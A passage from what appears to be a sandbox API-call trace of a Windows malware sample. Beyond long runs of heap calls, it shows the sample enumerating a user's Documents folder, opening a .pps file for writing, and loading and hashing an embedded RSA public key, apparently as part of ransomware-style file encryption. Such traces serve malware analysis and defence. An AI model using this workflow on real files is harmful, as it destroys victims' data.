(HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0191.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0191.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0191.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0191.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0191.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0191.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0191.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0191.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0191.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0191.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0191.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0191.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.906] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\") returned="PeBfuwtoR 4\\" [0191.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0191.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0191.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.906] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\") returned="AzlD\\" [0191.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30718 [0191.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0191.907] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0191.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0191.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30718 | out: hHeap=0x6a0000) returned 1 [0191.907] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0191.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0191.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0191.908] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0191.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0191.908] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0191.908] PathFindFileNameW (pszPath="") returned="" [0191.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.908] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29e970b0, ftCreationTime.dwHighDateTime=0x1d897e1, ftLastAccessTime.dwLowDateTime=0x63901a60, ftLastAccessTime.dwHighDateTime=0x1d89a27, ftLastWriteTime.dwLowDateTime=0x63901a60, ftLastWriteTime.dwHighDateTime=0x1d89a27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0191.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.913] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29e970b0, ftCreationTime.dwHighDateTime=0x1d897e1, ftLastAccessTime.dwLowDateTime=0x63901a60, ftLastAccessTime.dwHighDateTime=0x1d89a27, ftLastWriteTime.dwLowDateTime=0x63901a60, ftLastWriteTime.dwHighDateTime=0x1d89a27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0191.913] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a5f1a70, ftCreationTime.dwHighDateTime=0x1d89dc9, ftLastAccessTime.dwLowDateTime=0x6071ef90, ftLastAccessTime.dwHighDateTime=0x1d8a22c, ftLastWriteTime.dwLowDateTime=0x6071ef90, ftLastWriteTime.dwHighDateTime=0x1d8a22c, nFileSizeHigh=0x0, nFileSizeLow=0xd843, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-1Ots4A6s.pps", cAlternateFileName="-1OTS4~1.PPS")) returned 1 [0191.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0191.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0191.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0191.914] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\-1Ots4A6s.pps") returned=".pps" [0191.914] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\-1Ots4A6s.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\-1ots4a6s.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.915] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=55363) returned 1 [0191.916] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0191.918] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd81d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.918] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0191.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0191.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0191.921] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.921] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xd843, lpOverlapped=0x0) returned 1 [0191.922] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0191.922] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.922] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.922] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0191.924] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0191.924] CryptHashData (hHash=0x2cbfa90, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.924] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0191.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0191.924] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0191.924] GetLastError () returned 0x0 [0191.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0191.924] GetLastError () returned 0x0 [0191.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0191.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0191.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0191.925] CryptDestroyHash (hHash=0x2cbfa90) returned 1 [0191.925] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0191.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0191.925] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0191.925] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0191.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0191.925] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0191.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0191.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0191.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd840) returned 0x2d45778 [0191.926] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0191.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0191.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0191.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0191.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0191.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30718 [0191.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c10 [0191.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30760 [0191.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c28 [0191.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c58 [0191.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cb8 [0191.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c70 [0191.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0191.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0191.927] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0191.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0191.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0191.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0191.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0191.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0191.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0191.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cb8 [0191.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0191.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c70 [0191.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0191.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39c58 [0191.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0191.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0191.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0191.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0191.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0191.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0191.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0191.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0191.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0191.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0191.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0191.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0191.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0191.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0191.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0191.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0191.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0191.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0191.929] GetCurrentThreadId () returned 0x264 [0191.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0191.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44c60 [0191.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0191.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0191.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0191.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0191.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0191.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0191.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0191.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0191.930] GetCurrentThreadId () returned 0x264 [0191.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0191.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0191.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0191.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0191.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0191.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0191.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0191.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0191.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0191.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0191.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cb8 [0191.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c58 [0191.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0191.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0191.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 